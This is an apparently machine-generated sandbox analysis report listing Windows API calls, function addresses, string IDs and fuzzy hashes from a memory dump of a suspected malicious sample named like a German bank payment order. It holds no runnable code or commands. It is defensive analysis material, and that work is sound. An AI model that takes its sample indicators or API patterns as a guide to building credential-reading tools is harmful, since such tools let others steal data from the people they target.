                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C7118C71204701AFD328DF2DC881A27F7E9EF99300B21892EE49AC7385DA35E811CB55
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 004144E7
                                                                                                                                                                                                                                            • Part of subcall function 0040A353: _snwprintf.MSVCRT ref: 0040A398
                                                                                                                                                                                                                                            • Part of subcall function 0040A353: memcpy.MSVCRT(?,00000000,00000006,00000000,0000000A,%2.2X ,?), ref: 0040A3A8
                                                                                                                                                                                                                                          • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00414510
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 0041451A
                                                                                                                                                                                                                                          • GetPrivateProfileStringW.KERNEL32(?,?,Function_0004E518,?,00002000,?), ref: 0041453C
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: PrivateProfileStringmemset$Write_snwprintfmemcpy
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1127616056-0
                                                                                                                                                                                                                                          • Opcode ID: 914c831d0af6f6b5d0e69cc874d3cd2e27131541a502a72cc4fac318c133dcf3
                                                                                                                                                                                                                                          • Instruction ID: e03fcf36bb778615f94f946172f2cadce4c7e53e7889dedf6030812535802df7
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 914c831d0af6f6b5d0e69cc874d3cd2e27131541a502a72cc4fac318c133dcf3
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9A1170B1500119BFEF115F65EC02EDA7B69EF04714F100066FB09B2060E6319A60DB9D
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • memcpy.MSVCRT(?,?,00000068,sqlite_master), ref: 0042FEC6
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 0042FED3
                                                                                                                                                                                                                                          • memcpy.MSVCRT(?,?,00000068,?,?,?,00000000,?,?,?,?,?,?,?,sqlite_master), ref: 0042FF04
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: memcpy$memset
                                                                                                                                                                                                                                          • String ID: sqlite_master
                                                                                                                                                                                                                                          • API String ID: 438689982-3163232059
                                                                                                                                                                                                                                          • Opcode ID: ffda2190085ae9c3ce841de5d9405e2beeaf844ff5ba4b6923ab4bebb0b5ba17
                                                                                                                                                                                                                                          • Instruction ID: 9056235088afc86d32383ab843763c359d37acea7f1aa245e41bfa901f9896ac
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ffda2190085ae9c3ce841de5d9405e2beeaf844ff5ba4b6923ab4bebb0b5ba17
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9401C872D006047BDB11AFB19C42FDEBB7CEF05318F51452BFA0461182E73A97248795
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • SHGetMalloc.SHELL32(?), ref: 00414D9A
                                                                                                                                                                                                                                          • SHBrowseForFolderW.SHELL32(?), ref: 00414DCC
                                                                                                                                                                                                                                          • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00414DE0
                                                                                                                                                                                                                                          • wcscpy.MSVCRT ref: 00414DF3
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: BrowseFolderFromListMallocPathwcscpy
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3917621476-0
                                                                                                                                                                                                                                          • Opcode ID: e1f0fba32f57733aa2e62750ac03032e5e1fd264973d7f61484481ae59376fd7
                                                                                                                                                                                                                                          • Instruction ID: 3f0f02420fde520a26c7535fd1ed00e0b1d7e8cc8ebd586967f5863715f62e8c
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e1f0fba32f57733aa2e62750ac03032e5e1fd264973d7f61484481ae59376fd7
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3311FAB5A00208AFDB10DFA9D9889EEB7F8FB49314F10446AF905E7200D739DB45CB64
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D173
                                                                                                                                                                                                                                            • Part of subcall function 0040D134: LoadStringW.USER32(00000000,0000000A,00000FFF,?), ref: 0040D20C
                                                                                                                                                                                                                                            • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002), ref: 0040D24C
                                                                                                                                                                                                                                          • _snwprintf.MSVCRT ref: 00410FE1
                                                                                                                                                                                                                                          • SendMessageW.USER32(?,0000040B,00000000,?), ref: 00411046
                                                                                                                                                                                                                                            • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                                                                                                                                                                            • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                                                                                                                                                                            • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D1E1
                                                                                                                                                                                                                                          • _snwprintf.MSVCRT ref: 0041100C
                                                                                                                                                                                                                                          • wcscat.MSVCRT ref: 0041101F
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: HandleModule_snwprintf$LoadMessageSendStringmemcpywcscatwcscpywcslen
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 822687973-0
                                                                                                                                                                                                                                          • Opcode ID: 13244a37e27c3892f350f60725bb78b4c5ec5d087451c120d8dd0baf8caf14ec
                                                                                                                                                                                                                                          • Instruction ID: a8ddfa12325215ca31dcaa8c3ea10779747deab4b932dc2622e692dd88e5739d
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 13244a37e27c3892f350f60725bb78b4c5ec5d087451c120d8dd0baf8caf14ec
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DC0184B59003056AF730E765DC86FAB73ACAB44708F04047AB319F6183DA79A9454A6D
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,7693DF80,?,0041755F,?), ref: 00417452
                                                                                                                                                                                                                                          • malloc.MSVCRT ref: 00417459
                                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,00000000,00000000,?,7693DF80,?,0041755F,?), ref: 00417478
                                                                                                                                                                                                                                          • free.MSVCRT ref: 0041747F
Memory Dump Source
• Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID: ByteCharMultiWide$freemalloc
• String ID:
• API String ID: 2605342592-0
• Opcode ID: 11289aaf4270ed2c5fe81a5d6e150162e8e95aba20a128aae83a55a74a659502
• Instruction ID: 8389f0226c663b3c6d8c6253af8546a3d73aba679155ae8f7c82d0c1376384d0
• Opcode Fuzzy Hash: 11289aaf4270ed2c5fe81a5d6e150162e8e95aba20a128aae83a55a74a659502
• Instruction Fuzzy Hash: 1DF0E9B620D21E3F7B006AB55CC0C7B7B9CD7862FCB11072FF51091180E9594C1116B6
APIs
• GetModuleHandleW.KERNEL32(00000000,?,00000000), ref: 00412403
• RegisterClassW.USER32(00000001), ref: 00412428
• GetModuleHandleW.KERNEL32(00000000), ref: 0041242F
• CreateWindowExW.USER32(00000000,00000000,0044E518,00CF0000,00000000,00000000,00000280,000001E0,00000000,00000000,00000000,?), ref: 00412455
Similarity
• API ID: HandleModule$ClassCreateRegisterWindow
• String ID:
• API String ID: 2678498856-0
• Opcode ID: 3d8581704458cf3d0e12cdde0886d81e04a6e1a5031830fe2d02856e91d8c1e2
• Instruction ID: 2742b6e08e64d4f702ac0bdc031c2178a10537c5a2141806c9029dd5a11ba4c1
• Opcode Fuzzy Hash: 3d8581704458cf3d0e12cdde0886d81e04a6e1a5031830fe2d02856e91d8c1e2
• Instruction Fuzzy Hash: E601E5B1941228ABD7119FA68C89ADFBEBCFF09B14F10411AF514A2240D7B456408BE9
APIs
• GetDlgItem.USER32(?,?), ref: 00409B40
• SendMessageW.USER32(00000000,00000146,00000000,00000000), ref: 00409B58
• SendMessageW.USER32(00000000,00000150,00000000,00000000), ref: 00409B6E
• SendMessageW.USER32(00000000,0000014E,00000000,00000000), ref: 00409B91
Similarity
• API ID: MessageSend$Item
• String ID:
• API String ID: 3888421826-0
• Opcode ID: cb9c6f71d59db109bdd11c185378715e2458b2dfdf7aafdda88e0268854c6760
• Instruction ID: c5475329a145d4377f6ebcab718370c73cf4573fffc80ea9acc016878d8bcf0e
• Opcode Fuzzy Hash: cb9c6f71d59db109bdd11c185378715e2458b2dfdf7aafdda88e0268854c6760
• Instruction Fuzzy Hash: 89F01D75A0010CBFEB019F959CC1CAF7BBDFB497A4B204475F504E2150D274AE41AA64
APIs
• memset.MSVCRT ref: 00417B7B
• UnlockFileEx.KERNEL32(?,00000000,?,00000000,?), ref: 00417B9B
• LockFileEx.KERNEL32(?,00000001,00000000,?,00000000,?), ref: 00417BA7
• GetLastError.KERNEL32 ref: 00417BB5
Similarity
• API ID: File$ErrorLastLockUnlockmemset
• String ID:
• API String ID: 3727323765-0
• Opcode ID: 660d6347da47db4c597c862521096cecacc5d04f8920089305201e8d5f0c2e75
• Instruction ID: 0282759007fe27108f915f617c318df1b7667033481b7feabffed058191037b6
• Opcode Fuzzy Hash: 660d6347da47db4c597c862521096cecacc5d04f8920089305201e8d5f0c2e75
• Instruction Fuzzy Hash: A801F971108208BFDB219FA5DC84D9B77B8FB40308F20483AF51395050D730A944CB65
APIs
• memset.MSVCRT ref: 0040F673
• WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,00007FFF,00000000,00000000,00000000), ref: 0040F690
• strlen.MSVCRT ref: 0040F6A2
• WriteFile.KERNEL32(00000001,?,00000000,00000000,00000000), ref: 0040F6B3
Similarity
• API ID: ByteCharFileMultiWideWritememsetstrlen
• String ID:
• API String ID: 2754987064-0
• Opcode ID: 2d99b823047ec0f3cd03764c07ddb7da79dd9e7c990c2a315c49f172e64051b9
• Instruction ID: e5447571fde1e0de43d26e7f5909b1ba013d3ab3fbf9ce0dfcc5e01eb4e41d37
• Opcode Fuzzy Hash: 2d99b823047ec0f3cd03764c07ddb7da79dd9e7c990c2a315c49f172e64051b9
• Instruction Fuzzy Hash: 03F062B680102C7FEB81A794DC81DEB77ACEB05258F0080B2B715D2140E9749F484F7D
APIs
• memset.MSVCRT ref: 0040F6E2
• WideCharToMultiByte.KERNEL32(00000000,00000000,00000001,000000FF,?,00001FFF,00000000,00000000,00000001,0044E5FC,00000000,00000000,00000000,?,00000000,00000000), ref: 0040F6FB
• strlen.MSVCRT ref: 0040F70D
• WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0040F71E
Similarity
• API ID: ByteCharFileMultiWideWritememsetstrlen
• String ID:
• API String ID: 2754987064-0
• Opcode ID: 78dfd465d09002bf9bae10831117093d85a4e6860472b193aca7c856fde4830d
• Instruction ID: 4069f22fd96ae38f7b0fbed24adb75974e75abfa9f51d26af0f678a77882025e
• Opcode Fuzzy Hash: 78dfd465d09002bf9bae10831117093d85a4e6860472b193aca7c856fde4830d
• Instruction Fuzzy Hash: C8F06DB780022CBFFB059B94DCC8DEB77ACEB05254F0000A2B715D2042E6749F448BB8
APIs
• memset.MSVCRT ref: 00402FD7
• WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00001FFF,00000000,00000000), ref: 00402FF4
• strlen.MSVCRT ref: 00403006
• WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00403017
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2754987064-0
APIs
  • Part of subcall function 00409D7F: memset.MSVCRT ref: 00409D9E
  • Part of subcall function 00409D7F: GetClassNameW.USER32(?,00000000,000000FF), ref: 00409DB5
  • Part of subcall function 00409D7F: _wcsicmp.MSVCRT ref: 00409DC7
• SetBkMode.GDI32(?,00000001), ref: 004143A2
• SetBkColor.GDI32(?,00FFFFFF), ref: 004143B0
• SetTextColor.GDI32(?,00C00000), ref: 004143BE
• GetStockObject.GDI32(00000000), ref: 004143C6
Memory Dump Source
• Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID: Color$ClassModeNameObjectStockText_wcsicmpmemset
• String ID:
• API String ID: 764393265-0
APIs
• FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A76D
• SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?,?,?), ref: 0040A77D
• SystemTimeToFileTime.KERNEL32(?,?,?,?), ref: 0040A78C
Memory Dump Source
• Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID: Time$System$File$LocalSpecific
• String ID:
• API String ID: 979780441-0
APIs
• memcpy.MSVCRT(0045A808,?,00000050,?,0040155D,?), ref: 004134E0
• memcpy.MSVCRT(0045A538,?,000002CC,0045A808,?,00000050,?,0040155D,?), ref: 004134F2
• GetModuleHandleW.KERNEL32(00000000), ref: 00413505
• DialogBoxParamW.USER32(00000000,0000006B,?,Function_000131DC,00000000), ref: 00413519
Memory Dump Source
• Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID: memcpy$DialogHandleModuleParam
• String ID:
• API String ID: 1386444988-0
APIs
• SendMessageW.USER32(?,00000010,00000000,00000000), ref: 00411D71
• InvalidateRect.USER32(?,00000000,00000000), ref: 00411DC1
Strings
Memory Dump Source
• Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID: InvalidateMessageRectSend
• String ID: d=E
• API String ID: 909852535-3703654223
APIs
• wcschr.MSVCRT ref: 0040F79E
• wcschr.MSVCRT ref: 0040F7AC
  • Part of subcall function 0040AA8C: wcslen.MSVCRT ref: 0040AAA8
  • Part of subcall function 0040AA8C: memcpy.MSVCRT(00000000,?,00000000,00000000,?,0000002C,?,0040F7F4), ref: 0040AACB
Strings
Memory Dump Source
• Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID: wcschr$memcpywcslen
• String ID: "
• API String ID: 1983396471-123907689
APIs
  • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
• _memicmp.MSVCRT ref: 0040C00D
• memcpy.MSVCRT(?,?,00000004,00000000,?,?,?,?,?,?,?,?,*.*,0040C2BF,00000000), ref: 0040C024
Strings
Similarity
• API ID: FilePointer_memicmpmemcpy
• String ID: URL
• API String ID: 2108176848-3574463123
APIs
• _snwprintf.MSVCRT ref: 0040A398
• memcpy.MSVCRT(?,00000000,00000006,00000000,0000000A,%2.2X ,?), ref: 0040A3A8
Strings
Similarity
• API ID: _snwprintfmemcpy
• String ID: %2.2X
• API String ID: 2789212964-323797159
APIs
Strings
Similarity
• API ID: _snwprintf
• String ID: %%-%d.%ds
• API String ID: 3988819677-2008345750
APIs
• GetWindowPlacement.USER32(?,?,?,?,?,00411B7F,?,General,?,00000000,00000001), ref: 00401904
• memset.MSVCRT ref: 00401917
Strings
Similarity
• API ID: PlacementWindowmemset
• String ID: WinPos
• API String ID: 4036792311-2823255486
APIs
  • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,0040DCE6,00000000,0040DB99,?,00000000,00000208,?), ref: 00409BD5
• wcsrchr.MSVCRT ref: 0040DCE9
• wcscat.MSVCRT ref: 0040DCFF
Strings
Similarity
• API ID: FileModuleNamewcscatwcsrchr
• String ID: _lng.ini
• API String ID: 383090722-1948609170
APIs
  • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
  • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
  • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
  • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
• GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
Strings
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: LibraryLoad$AddressDirectoryProcSystemmemsetwcscatwcscpy
                                                                                                                                                                                                                                          • String ID: SHGetSpecialFolderPathW$shell32.dll
                                                                                                                                                                                                                                          • API String ID: 2773794195-880857682
                                                                                                                                                                                                                                          • Opcode ID: 92b59310a7696b31d56b4dabc8b2146732067b292673cf67eedff05cdcb4dbe7
                                                                                                                                                                                                                                          • Instruction ID: 520684b8054713cb13715c6c8af1848dbb459e29e8538d47b3508bbaa4bbc045
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 92b59310a7696b31d56b4dabc8b2146732067b292673cf67eedff05cdcb4dbe7
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 23D0C7719483019DD7105F65AC19B8336545B50307F204077AC04E66D7EA7CC4C49E1D
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetWindowLongW.USER32(?,000000EC), ref: 0040A159
                                                                                                                                                                                                                                          • SetWindowLongW.USER32(000000EC,000000EC,00000000), ref: 0040A16B
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: LongWindow
                                                                                                                                                                                                                                          • String ID: MZ@
                                                                                                                                                                                                                                          • API String ID: 1378638983-2978689999
                                                                                                                                                                                                                                          • Opcode ID: 897d752f6043cc922bbe5e3779e5fd859b92255b25006c63bcdd8f44162c87a9
                                                                                                                                                                                                                                          • Instruction ID: 658df1d6f65a5f4ca5cf2dc917bfbc57e2b12ac14a328fb0c2cac09aa770bd9f
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 897d752f6043cc922bbe5e3779e5fd859b92255b25006c63bcdd8f44162c87a9
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3FC0027415D116AFDF112B35EC0AE2A7EA9BB86362F208BB4B076E01F1CB7184109A09
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • memcpy.MSVCRT(?,?,00000000,?), ref: 0042BA5F
                                                                                                                                                                                                                                          • memcpy.MSVCRT(?,?,?,?), ref: 0042BA98
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 0042BAAE
                                                                                                                                                                                                                                          • memcpy.MSVCRT(?,?,00000000,?,?,?,?,?,?,?), ref: 0042BAE7
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: memcpy$memset
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 438689982-0
                                                                                                                                                                                                                                          • Opcode ID: 03305e9dc29a3088a8453c5c8815f649f32074ab8e1cbf0618065e1a77e51243
                                                                                                                                                                                                                                          • Instruction ID: 797e1fd24865db6de4a95defd5ca955254a0dec7c2ff798398e4890fb9874305
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 03305e9dc29a3088a8453c5c8815f649f32074ab8e1cbf0618065e1a77e51243
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1B51A2B5A00219EBDF14DF55D882BAEBBB5FF04340F54806AE904AA245E7389E50DBD8
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 0040A13C: memset.MSVCRT ref: 0040A14A
                                                                                                                                                                                                                                          • ??2@YAPAXI@Z.MSVCRT ref: 0040E84D
                                                                                                                                                                                                                                          • ??2@YAPAXI@Z.MSVCRT(00000014), ref: 0040E874
                                                                                                                                                                                                                                          • ??2@YAPAXI@Z.MSVCRT(00000014), ref: 0040E895
                                                                                                                                                                                                                                          • ??2@YAPAXI@Z.MSVCRT(00000014), ref: 0040E8B6
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ??2@$memset
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1860491036-0
                                                                                                                                                                                                                                          • Opcode ID: 96af4030734a5e2f6ef23c2ae6277f6dabdb1784b135b246f31e93988d402875
                                                                                                                                                                                                                                          • Instruction ID: 7dda0de82ffecb18951b1be6aadeef514c87807746e1e94fbb8d74dd8fa57bec
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 96af4030734a5e2f6ef23c2ae6277f6dabdb1784b135b246f31e93988d402875
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4F21F3B1A003008FDB219F2B9445912FBE8FF90310B2AC8AF9158CB2B2D7B8C454CF15
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • wcslen.MSVCRT ref: 0040A8E2
                                                                                                                                                                                                                                            • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                                                                                                                                                                                            • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,00000000,00000000,00000000,?,0040A9F2,00000002,?,00000000,?,0040AD25,00000000,?,00000000), ref: 00409A28
                                                                                                                                                                                                                                            • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                                                                                                                                                                                                          • free.MSVCRT ref: 0040A908
                                                                                                                                                                                                                                          • free.MSVCRT ref: 0040A92B
                                                                                                                                                                                                                                          • memcpy.MSVCRT(?,?,000000FF,00000001,?,00000000,?,?,0040AD76,?,000000FF), ref: 0040A94F
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
